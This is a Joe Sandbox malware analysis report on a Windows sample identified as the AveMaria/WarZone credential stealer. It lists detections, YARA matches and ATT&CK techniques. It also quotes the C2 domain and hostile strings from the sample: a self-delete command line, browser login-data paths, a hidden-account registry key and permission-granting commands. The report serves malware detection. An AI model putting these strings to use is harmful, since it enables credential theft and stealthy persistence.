Play interactive tour

Edit tour

Windows Analysis Report sb.exe

Overview

General Information

Sample Name:	sb.exe
Analysis ID:	492126
MD5:	e310cb3185d95e3dda42f0230b569d84
SHA1:	c20c8aa953f7df7e9b117258a0d31530e23ffc55
SHA256:	82867648313483db4a6115e0cc2b34c06719ffdb6667e50e625e2dc130adfbca
Tags:	arostetelemaccaexe
Infos:
Most interesting Screenshot:

Detection

AveMaria

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AveMaria stealer

C2 URLs / IPs found in malware configuration

Contains functionality to hide user accounts

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Installs a raw input device (often for capturing keystrokes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Potential key logger detected (key state polling based)

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

sb.exe (PID: 6404 cmdline: 'C:\Users\user\Desktop\sb.exe' MD5: E310CB3185D95E3DDA42F0230B569D84)

conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "cachepallioniwarznpa.icu", "port": 5200}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: sb.exe PID: 6404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.sb.exe.27e053f.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16478:$a1: \Opera Software\Opera Stable\Login Data 0x167a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x160e8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.sb.exe.27e053f.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.sb.exe.27e053f.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.sb.exe.27e053f.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x18520:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18274:$str2: MsgBox.exe 0x18148:$str6: Ave_Maria 0x177e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x16e08:$str8: SMTP Password 0x160e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x177c0:$str12: \sqlmap.dll
0.2.sb.exe.27e053f.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15878:$a1: \Opera Software\Opera Stable\Login Data 0x15ba0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x154e8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.sb.exe.27e053f.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.sb.exe.27e053f.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.sb.exe.27e053f.1.unpack	AveMaria_WarZone	unknown	unknown	0x17920:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x17674:$str2: MsgBox.exe 0x17548:$str6: Ave_Maria 0x16be8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x16208:$str8: SMTP Password 0x154e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x16bc0:$str12: \sqlmap.dll
0.2.sb.exe.31e0000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16478:$a1: \Opera Software\Opera Stable\Login Data 0x167a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x160e8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.sb.exe.31e0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.sb.exe.31e0000.3.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.sb.exe.31e0000.3.unpack	AveMaria_WarZone	unknown	unknown	0x18520:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18274:$str2: MsgBox.exe 0x18148:$str6: Ave_Maria 0x177e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x16e08:$str8: SMTP Password 0x160e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x177c0:$str12: \sqlmap.dll
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.sb.exe.27e053f.1.raw.unpack

Malware Configuration Extractor: AveMaria {"C2 url": "cachepallioniwarznpa.icu", "port": 5200}

Multi AV Scanner detection for submitted file

Show sources

Source: sb.exe	Virustotal: Detection: 38%			Perma Link
Source: sb.exe	ReversingLabs: Detection: 42%

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, type: MEMORY

Source: 0.2.sb.exe.31e0000.3.unpack	Avira: Label: TR/Downloader.Gen
Source: 0.2.sb.exe.27e053f.1.unpack	Avira: Label: TR/Patched.Ren.Gen3

Source: sb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\sb.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: sb.exe

Static PE information: certificate valid

Source: sb.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: sb.exe, 00000000.00000002.374832358.00000000031FB000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: sb.exe, 00000000.00000002.374832358.00000000031FB000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\General\DispSink\DispClient\Free real estate.pdb source: sb.exe

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: cachepallioniwarznpa.icu

Source: sb.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sb.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sb.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sb.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sb.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: sb.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: sb.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sb.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sb.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sb.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sb.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: sb.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: sb.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: sb.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: sb.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: sb.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: sb.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: sb.exe, 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: sb.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: sb.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: sb.exe, 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp

Binary or memory string: GetRawInputData

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CB8A55 GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_00CB8A55

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown

Source: sb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CC0074	0_2_00CC0074
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CD401C	0_2_00CD401C
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CFAD78	0_2_00CFAD78
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CF16A0	0_2_00CF16A0
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CF26B6	0_2_00CF26B6
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CF9230	0_2_00CF9230
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CF9354	0_2_00CF9354

Source: sb.exe	Virustotal: Detection: 38%
Source: sb.exe	ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\sb.exe

File read: C:\Users\user\Desktop\sb.exe

Jump to behavior

Source: sb.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sb.exe 'C:\Users\user\Desktop\sb.exe'
Source: C:\Users\user\Desktop\sb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Users\user\Desktop\sb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CB2C5D __EH_prolog3_catch_GS,LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary,

0_2_00CB2C5D

Source: C:\Users\user\Desktop\sb.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: classification engine

Classification label: mal60.troj.winEXE@2/0@0/0

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CB249C CoCreateInstance,

0_2_00CB249C

Source: sb.exe

Static file information: File size 1627136 > 1048576

Source: C:\Users\user\Desktop\sb.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: sb.exe

Static PE information: certificate valid

Source: sb.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x12a200

Source: sb.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sb.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sb.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: sb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: sb.exe, 00000000.00000002.374832358.00000000031FB000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: sb.exe, 00000000.00000002.374832358.00000000031FB000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\General\DispSink\DispClient\Free real estate.pdb source: sb.exe

Source: sb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sb.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CFBEC3 push ecx; ret		0_2_00CFBED6
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CBEE06 push ecx; ret		0_2_00CBEE19

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: sb.exe, 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: sb.exe, 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread\|"

Source: C:\Users\user\Desktop\sb.exe TID: 2224

Thread sleep count: 70 > 30

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CDBC81 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CDBC81

Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CDD54C mov eax, dword ptr fs:[00000030h]	0_2_00CDD54C
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CBCAC7 mov esi, dword ptr fs:[00000030h]	0_2_00CBCAC7
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CE73DD mov eax, dword ptr fs:[00000030h]	0_2_00CE73DD

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CBC9B1 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

0_2_00CBC9B1

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CDBC81 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00CDBC81
Source: C:\Users\user\Desktop\sb.exe	Code function: 0_2_00CBDF6A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00CBDF6A

Source: C:\Users\user\Desktop\sb.exe

Code function: 0_2_00CBEFC2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CBEFC2

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sb.exe PID: 6404, type: MEMORYSTR

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.sb.exe.27e053f.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.27e053f.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.sb.exe.31e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.374727716.00000000027E0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading2	Input Capture21	System Time Discovery1	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Information Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Users1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sb.exe	38%	Virustotal		Browse
sb.exe	42%	ReversingLabs	Win32.Trojan.Streamer

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.sb.exe.31e0000.3.unpack	100%	Avira	TR/Downloader.Gen		Download File
0.2.sb.exe.27e053f.1.unpack	100%	Avira	TR/Patched.Ren.Gen3		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
cachepallioniwarznpa.icu	0%	Virustotal		Browse
cachepallioniwarznpa.icu	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cachepallioniwarznpa.icu	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	sb.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	sb.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	sb.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	sb.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	sb.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	sb.exe	false	URL Reputation: safe	unknown
https://github.com/syohex/java-simple-mine-sweeperC:	sb.exe, 00000000.00000002.374825576.00000000031F6000.00000002.00000001.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492126
Start date:	28.09.2021
Start time:	11:48:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	sb.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.troj.winEXE@2/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 91.8%) Quality average: 76% Quality standard deviation: 30.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
